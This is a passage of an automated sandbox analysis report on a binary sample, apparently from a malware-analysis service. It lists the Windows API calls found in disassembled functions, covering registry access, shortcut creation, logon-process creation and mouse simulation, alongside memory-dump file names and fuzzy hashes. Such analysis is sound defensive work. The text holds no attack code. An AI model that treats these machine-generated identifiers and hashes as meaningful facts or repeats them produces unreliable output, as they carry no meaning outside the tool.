                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1414292761-0
                                                                                                      • Opcode ID: edd5461ebb75042e39f5c159310d48d704bee4fe656ff0026e80c78716572f20
                                                                                                      • Instruction ID: 65f009f5ed651451a6c4ec30aeb9b5b25d8f002a01a7345b4d8eecad5582fb93
                                                                                                      • Opcode Fuzzy Hash: edd5461ebb75042e39f5c159310d48d704bee4fe656ff0026e80c78716572f20
                                                                                                      • Instruction Fuzzy Hash: 33510372600216ABEF248F64CC81EBF77AAEB42B54F194229FC06D6140EB74EC44C6B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                        • Part of subcall function 00D9D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D9C00D,?,?), ref: 00D9D314
                                                                                                        • Part of subcall function 00D9D2F7: _wcslen.LIBCMT ref: 00D9D350
                                                                                                        • Part of subcall function 00D9D2F7: _wcslen.LIBCMT ref: 00D9D3C7
                                                                                                        • Part of subcall function 00D9D2F7: _wcslen.LIBCMT ref: 00D9D3FD
                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D9C629
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D9C684
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D9C6C9
                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00D9C6F8
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D9C752
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00D9C75E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 1120388591-0
                                                                                                      • Opcode ID: 7612ac539ce8ff4046aa6fb1e3d6d0bf189d1e723bcfad41f8dc234b1c352cb9
                                                                                                      • Instruction ID: 24258508760867b723a144ba24b19170ec58e00dc41384d66d1c02f582ac7a87
                                                                                                      • Opcode Fuzzy Hash: 7612ac539ce8ff4046aa6fb1e3d6d0bf189d1e723bcfad41f8dc234b1c352cb9
                                                                                                      • Instruction Fuzzy Hash: B8818E31118341AFD714DF64C884E6ABBE5FF84308F14555CF4968B2A2DB31ED45CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VariantInit.OLEAUT32(00000035), ref: 00D70049
                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00D700F0
                                                                                                      • VariantCopy.OLEAUT32(00D702F4,00000000), ref: 00D70119
                                                                                                      • VariantClear.OLEAUT32(00D702F4), ref: 00D7013D
                                                                                                      • VariantCopy.OLEAUT32(00D702F4,00000000), ref: 00D70141
                                                                                                      • VariantClear.OLEAUT32(?), ref: 00D7014B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                                      • String ID:
                                                                                                      • API String ID: 3859894641-0
                                                                                                      • Opcode ID: b9d02ea73a8855c9e02c32d8804378f2456a1c62a2861d8a3d1612850faf1172
                                                                                                      • Instruction ID: 878bfcdc9cf8a31dd2b688713dfa653d036589b7acdd7010e486289f3caf5b63
                                                                                                      • Opcode Fuzzy Hash: b9d02ea73a8855c9e02c32d8804378f2456a1c62a2861d8a3d1612850faf1172
                                                                                                      • Instruction Fuzzy Hash: E451D631650310EACF20AB64D895B69BBA9EF55310F14D447E90ADF2D6FB709C40CBB5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D14154: _wcslen.LIBCMT ref: 00D14159
                                                                                                        • Part of subcall function 00D184B7: _wcslen.LIBCMT ref: 00D184CA
                                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00D89E3F
                                                                                                      • _wcslen.LIBCMT ref: 00D89E60
                                                                                                      • _wcslen.LIBCMT ref: 00D89E87
                                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00D89EDF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                                                      • String ID: X
                                                                                                      • API String ID: 83654149-3081909835
                                                                                                      • Opcode ID: f0a47bdd109dcc39f49de5d51146bd177df7fd4591aaa3600e46bcf9378eecdf
                                                                                                      • Instruction ID: fc38cd6bda83308321dc368a9fdad2c8f434162434a243bbe5ae30b814ba66a4
                                                                                                      • Opcode Fuzzy Hash: f0a47bdd109dcc39f49de5d51146bd177df7fd4591aaa3600e46bcf9378eecdf
                                                                                                      • Instruction Fuzzy Hash: 95E19F315043409FD724EF64D891AAAB7E5FF84314F08856DF8899B2A2DB31ED45CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _wcslen.LIBCMT ref: 00D86E36
                                                                                                      • CoInitialize.OLE32(00000000), ref: 00D86F93
                                                                                                      • CoCreateInstance.OLE32(00DB0CC4,00000000,00000001,00DB0B34,?), ref: 00D86FAA
                                                                                                      • CoUninitialize.OLE32 ref: 00D8722E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                      • String ID: .lnk
                                                                                                      • API String ID: 886957087-24824748
                                                                                                      • Opcode ID: 533a15ebdc44a2aa3f264e1ae7400b577debdd8171e789ffcfcd818d45cf6bd1
                                                                                                      • Instruction ID: 40e74efc06d493e55bf1b154586c3030c44b9238f16ea3de5226113e76f3019e
                                                                                                      • Opcode Fuzzy Hash: 533a15ebdc44a2aa3f264e1ae7400b577debdd8171e789ffcfcd818d45cf6bd1
                                                                                                      • Instruction Fuzzy Hash: 1ED14771608301AFC304EF24D881EABB7E8EF94714F54495DF5958B2A1DB70ED49CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D12441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D12452
                                                                                                      • BeginPaint.USER32(?,?,?), ref: 00D11AE1
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00D11B45
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00D11B62
                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D11B73
                                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00D11BC1
                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00D5324B
                                                                                                        • Part of subcall function 00D11BD9: BeginPath.GDI32(00000000), ref: 00D11BF7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                      • String ID:
                                                                                                      • API String ID: 3050599898-0
                                                                                                      • Opcode ID: 569e49c40e8d17097a55fead8b50fd87491569fc3c2aeed79b9db847398f4f80
                                                                                                      • Instruction ID: 50682ee12616dcbed60a1a584ded3c446f11b66a68e75df4dabde64717233d5f
                                                                                                      • Opcode Fuzzy Hash: 569e49c40e8d17097a55fead8b50fd87491569fc3c2aeed79b9db847398f4f80
                                                                                                      • Instruction Fuzzy Hash: 9641B334105300AFDB10DF24ECC4FB67BA9EB46325F140269FA95C62A2DB319985DB71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00D810C8
                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00D81103
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00D8111F
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00D81198
                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00D811AF
                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D811DD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 3368777196-0
                                                                                                      • Opcode ID: e3fde18c8e6d30f12f259e973ccf445d55a9472cea80526c7a794caa598f97a8
                                                                                                      • Instruction ID: 8c6ce1b7ec19134fc8b0df32d1ffb2a2f8921e9ead63ab3db0d516aa7d864117
                                                                                                      • Opcode Fuzzy Hash: e3fde18c8e6d30f12f259e973ccf445d55a9472cea80526c7a794caa598f97a8
                                                                                                      • Instruction Fuzzy Hash: 6D415975900305ABDF04AF54DC85AAABBB9FF44300F1480A5EE00AA29ADB30DE55DBB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00D6FB8F,00000000,?,?,00000000,?,00D539BC,00000004,00000000,00000000), ref: 00DA8BAB
                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00DA8BD1
                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00DA8C30
                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00DA8C44
                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00DA8C6A
                                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00DA8C8E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 642888154-0
                                                                                                      • Opcode ID: fbe1c71aee4bb25212329eb2f9b78cd567162f6d855b4c2b9ec1895fd92fec42
                                                                                                      • Instruction ID: ebecedbcbb83f86ed0688d6fef587bac94c7b4476caf38e44aaff88af922b17b
                                                                                                      • Opcode Fuzzy Hash: fbe1c71aee4bb25212329eb2f9b78cd567162f6d855b4c2b9ec1895fd92fec42
                                                                                                      • Instruction Fuzzy Hash: EE418375A02244AFDB16CF24D889BA17BE1FB0A314F1C5169E9098F3A2CB31A841DF71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00D92C45
                                                                                                        • Part of subcall function 00D8EE49: GetWindowRect.USER32(?,?), ref: 00D8EE61
                                                                                                      • GetDesktopWindow.USER32 ref: 00D92C6F
                                                                                                      • GetWindowRect.USER32(00000000), ref: 00D92C76
                                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00D92CB2
                                                                                                      • GetCursorPos.USER32(?), ref: 00D92CDE
                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00D92D3C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                      • String ID:
                                                                                                      • API String ID: 2387181109-0
                                                                                                      • Opcode ID: e04577f779215f5e89d5c3f78268801ff20e28aae140b35fa0c4537019eac485
                                                                                                      • Instruction ID: 60d512fb7bc770e7b459466bae467e0804ba364dbe03296e19231b2059605903
                                                                                                      • Opcode Fuzzy Hash: e04577f779215f5e89d5c3f78268801ff20e28aae140b35fa0c4537019eac485
                                                                                                      • Instruction Fuzzy Hash: C631AF72505315ABDB20DF14D849BAAB7AAFFC5354F040919F989E7291DB30E9048BB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 00D75524
                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D75541
                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D75579
                                                                                                      • _wcslen.LIBCMT ref: 00D75597
                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D7559F
                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00D755A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                      • String ID:
                                                                                                      • API String ID: 72514467-0
                                                                                                      • Opcode ID: 6ead5c8a0cfdd660299a14dd514f4f70d8cb0ef83f4b4444a8fd5550e055030a
                                                                                                      • Instruction ID: 71b842223a2607c6a9cfc8781a10452d3f818fc73063664d5dc65e48570cfab9
                                                                                                      • Opcode Fuzzy Hash: 6ead5c8a0cfdd660299a14dd514f4f70d8cb0ef83f4b4444a8fd5550e055030a
                                                                                                      • Instruction Fuzzy Hash: 302126722047047BEB155F28AC49E7B7FAADF85760F188029F80ACA195FAA5DC4093B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D15558,?,?,00D54B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D1559E
                                                                                                      • _wcslen.LIBCMT ref: 00D861D5
                                                                                                      • CoInitialize.OLE32(00000000), ref: 00D862EF
                                                                                                      • CoCreateInstance.OLE32(00DB0CC4,00000000,00000001,00DB0B34,?), ref: 00D86308
                                                                                                      • CoUninitialize.OLE32 ref: 00D86326
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                      • String ID: .lnk
                                                                                                      • API String ID: 3172280962-24824748
                                                                                                      • Opcode ID: cddff5337cdd87a81fbe8bae976eea5243d99ecc002cb1449e04c4e2851cafab
                                                                                                      • Instruction ID: 21771c0d0103d13364b5c4ed3c792be3c0569450fb743e772b6d696311450e0f
                                                                                                      • Opcode Fuzzy Hash: cddff5337cdd87a81fbe8bae976eea5243d99ecc002cb1449e04c4e2851cafab
                                                                                                      • Instruction Fuzzy Hash: 46D125756082119FC714EF24C484A6EBBE5FF89724F14889DF8869B361DB31EC45CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D71844: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D7185A
                                                                                                        • Part of subcall function 00D71844: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D71866
                                                                                                        • Part of subcall function 00D71844: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D71875
                                                                                                        • Part of subcall function 00D71844: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D7187C
                                                                                                        • Part of subcall function 00D71844: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D71892
                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00D71BC5), ref: 00D7203E
                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D7204A
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00D72051
                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00D7206A
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00D71BC5), ref: 00D7207E
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D72085
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                      • String ID:
                                                                                                      • API String ID: 3008561057-0
                                                                                                      • Opcode ID: fc78987c00a4e31237d24a4c0612c47f8e5c14cec32cd734128ada1a4f0b6176
                                                                                                      • Instruction ID: 28b305e0aae9b826b7eaa99bca0d9a6b920949564a9c0be8f4abbbcd041dd707
                                                                                                      • Opcode Fuzzy Hash: fc78987c00a4e31237d24a4c0612c47f8e5c14cec32cd734128ada1a4f0b6176
                                                                                                      • Instruction Fuzzy Hash: 58117C75600305FFDB249F64CC09BBE7BA9FB45355F148118E846D7220E7359944CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D71D8F
                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00D71D96
                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D71DA5
                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00D71DB0
                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D71DDF
                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00D71DF3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                      • String ID:
                                                                                                      • API String ID: 1413079979-0
                                                                                                      • Opcode ID: 4916f6521e5fd3369632045f82616b14fec0f567bac70d3186fde760ff5d68eb
                                                                                                      • Instruction ID: af4e20f7ad2d0a091a33272f3b65bc8f9fe43ba36c8b72d6ec831337ecbc893d
                                                                                                      • Opcode Fuzzy Hash: 4916f6521e5fd3369632045f82616b14fec0f567bac70d3186fde760ff5d68eb
                                                                                                      • Instruction Fuzzy Hash: A9113D7650020DABDF218F98DD49FDE7BAAEF49344F088114FA05A2160E375CE65DB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,00D33709,00D33375), ref: 00D33720
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D3372E
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D33747
                                                                                                      • SetLastError.KERNEL32(00000000,?,00D33709,00D33375), ref: 00D33799
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
